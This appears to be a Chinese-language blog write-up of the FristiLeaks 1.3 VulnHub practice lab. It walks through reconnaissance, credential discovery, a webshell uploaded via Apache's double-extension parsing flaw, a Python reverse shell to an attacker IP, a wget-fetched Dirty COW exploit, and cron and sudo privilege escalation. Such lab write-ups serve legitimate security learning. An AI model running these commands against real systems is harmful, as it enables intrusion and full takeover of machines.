vulnhub系列:Fristileaks 1.3

于 2024-07-31 20:46:22 发布
阅读量371 收藏 5
点赞数 8
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/140832246
版权

vulnhub系列:Fristileaks 1.3

靶机下载

根据官网提示,将mac地址改为 08:00:27:A5:A6:76

01

IP地址在启动后已经给出

02

一、信息收集

nmap扫描端口,只开启了80端口,是apache2.2.15版本,且robots.txt中给出了三个目录:/cola /sisi /beer

nmap 192.168.23.170 -A

04

目录扫描,没什么新发现

dirb http://192.168.23.170

05

访问目标首页,没什么发现

03

访问robots.txt中的三个路径,返回的都是同一张图片,上面写着这不是url,可能需要找到一个url或路径

06

尝试之后,将首页的fristi拼接可以得到新页面

07

可以看到说是一个管理门户

08

在登录框测试弱口令、暴力破解等没有成功,也没有找到其他功能点

f12查看源码

一个提示:表示对图片进行了base64加密

11

一个留言(留言的名字可能作为用户名)

10

一串base64的加密字符

09

把这串加密字符复制下来,写入到1.txt中进行解密

base64 -d 1.txt

12

解密发现是一个图片,那么把内容写入到图片中,查看图片

base64 -d 1.txt > 1.png

13

这里的内容可能作为密码,用之前疑似用户名的留言者和这一串值进行登录,成功登录

eezeepz:keKkeKKeKKeKkEkkEk

14

有一个文件上传功能

15

二、getshell

上传php文件失败,burp拦截数据包,修改Content-Type尝试绕过,失败

16

考虑到之前扫描到使用了apache服务器,版本为2.2.15,可以尝试利用其解析漏洞

在Apache1.x/2.x版本中,Apache默认一个文件可以有多个以点分割的后缀,解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。直到识别到合法后缀才进行解析。如 1.php.png

可以看到是存在漏洞的,文件成功上传到了/uploads目录下

17

访问该文件,文件正常解析

http://192.168.23.170/fristi/uploads/1.php.png

18

蚁剑进行连接

19

上传一个执行系统命令的文件

20

使用hackbar插件,提交post数据

cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.23.133",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

21

成功反弹shell

22

三、提权

1、脏牛提权

查看内核版本,可以尝试脏牛提权

uname -r

23

查找脏牛脚本

searchsploit 'Dirty COW'

24

用一个符合版本的脚本,将其导到当前路径

searchsploit -m 40839.c

25

本机开启一个临时的web服务

python3 -m http.server

26

wget下载脏牛脚本,并赋予权限

wget http://192.168.23.133:8000/40839.c

chmod 777 40839.c

27

编译并运行,密码自己设置一个,我这里设置123456

gcc -pthread 40839.c -o 40839 -lcrypt

./40839

28

切换到firefart用户,提权成功

su firefart

id

29

2、sudo提权

home目录查看用户,有三个用户,进入admin目录是没有权限

admin
eezeepz
fristigod

30

在eezeepz家目录下找到notes.txt

我让你可以做一些自动检查,但我只允许您访问/usr/bin/*系统二进制文件
然而,我确实复制了一些额外的经常需要的命令到我的homedir:chmod、df、cat、echo、ps、grep、egrep,这样您就可以使用它们了
来自/home/admin/

不要忘记为每个二进制文件指定完整路径!

只需在/tmp/中放入一个名为“runthis”的文件,每行一个命令。这个输出转到/tmp/中的文件“cronresult”。它应该以我的帐户权限每分钟运行一次

31

执行如下命令

echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis

查看/tmp/cronresult

cat /tmp/cronresult

32

成功cd到admin用户

33

查看文件,发现两串base64值

whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

34

一个加密脚本

import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

35

尝试逆转机密机制,将脚本保存到桌面下1.py

import base64,codecs,sys

def decodeString(str):
  rot13string = codecs.decode(str[::-1], 'rot13')
  return base64.b64decode(rot13string)

print(decodeString(sys.argv[1]))

运行1.py脚本解密

python 1.py =RFn0AKnlMHMPIzpyuTI0ITG
LetThereBeFristi!

python 1.py mVGZ3O3omkJLmy2pcuTq
thisisalsopw123

36

登录fristigod,发现并不是root权限

fristigod
LetThereBeFristi!

37

history查看历史命令,发现执行命令时会使用sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

38

以root身份打开终端,在命令后加/bin/bash提权成功

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

39

三天三夜睡不着
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机:FristiLeaks_1.3
qq_48904485的博客
03-19 974
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:FristiLeaks 1.3(10.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/注意安装靶机的时候需要将靶机的MAC地址改为:08:00:27:A5:A6:76,否则靶机ip地址会获取不到。
vulnhub渗透系列FristiLeaks: 1.3
来到了学渣的博客
02-06 2093
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.该靶机安装好后自动提示了IP地址,所以直接探测存活的端口就行,发现与以往不一样的是它只开放了80端口,nmap同时也扫出来cola/sisi/beer三个目录。 2.进入80端web页面,登录到cola/sisi/beer发现图片提示主要...
vulnhub靶机渗透 FRISTILEAKS: 1.3
RestoreJustice的博客
03-18 223
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。冷静(fristi),这张图片就是首页的我们第二次看到再结合到上一张图片的提示,这张很有可能有提示。根据官网提供的说明,首先要将要求设置VMware虚拟机的MAC地址 08:00:27:A5:A6:76,然后开启VM。在图片中插入phpinfo和一句话木马,成功上传到 /uploads目录,根据前面的目录爆破可知上传路径。
vulnhub FristiLeaks: 1.3
箭雨镜屋
02-04 2239
渗透思路: nmap扫描----->查看robots.txt,并根据主页信息推测出admin portal的url----->查看网页源代码,分析注释,base64解码出包含重要信息的png图片----->hydra暴力破解网站用户名密码(其实不需要暴力破解)----->利用文件上传(apache httpd多后缀文件解析漏洞)获得反弹shell----->利用定时文件修改目录权限----->编写python脚本解码,得到admin和fristigod的密码----->sudo提权获得root权限
Vulnhub靶机渗透:FRISTILEAKS: 1.3
Mysmycbx的博客
05-27 2034
信息收集很难,需要总结
VulnHub-FRISTILEAKS 1.3
热门推荐
江左盟的博客
12-02 1万+
简介 这是一台CTF类的靶机,比较考验脑洞,我个人不大喜欢,能想到作者的设计的点会觉得简单,想不到就觉得难。该靶机通过网页源码获取登录用户名和密码,然后利用Apache解析漏洞获取服务器权限,可利用脏牛直接提升至root用户权限,也可利用计划任务先获取admin用户权限,然后解密密文获得fristigod用户登录密码,最后利用SUID程序提升至root权限。 靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 信息收集 使用nmap --min-
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3
LYJ20010728的博客
08-06 1431
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3环境下载TOPHATSEC: FRESHLY靶机搭建渗透测试信息搜集漏洞挖掘 环境下载 戳此进行环境下载 TOPHATSEC: FRESHLY靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式,虚拟机的MAC地址为:08:00:27:A5:A6:76 获取到目标靶机的IP为:192.168.246.132 渗透测试 信息搜集 用Nmap扫描一下目标靶机:sudo nmap -sS -A 192.168.246.
【甄选靶场】Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)
人间体佐菲的博客
09-18 715
网络安全,基础,靶场,信息安全,渗透测试,红队
16-VulnHub-FristiLeaks 1.3
尼德霍格007
08-11 178
VulnHub-FristiLeaks: 1.3 靶机地址:https://www.vulnhub.com/entry/fristileaks-13,133/ 目标:得到root权限&找到四个flag.txt 作者:尼德霍格007 时间:2021-8-10 注意:这台靶机和之前的有一点不一样,要手动把网卡的MAC地址设置为08:00:27:A5:A6:76才行 本文用到的代码请勿用于非法用途,否则后果自负 一、信息收集 设置完MAC地址后靶机IP会直接显现,不需要探测 这里已经显示了IP:192.
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
打靶练习vulnhub: stapler
03-28
打靶练习vulnhub: stapler
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 748
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
网络安全相关竞赛比赛
黑战士的博客
07-18 1411
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1257
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
网络安全之不同阶段攻防手段(四)
最新发布
子非渔
07-25 474
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
vulnhub靶机系列
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值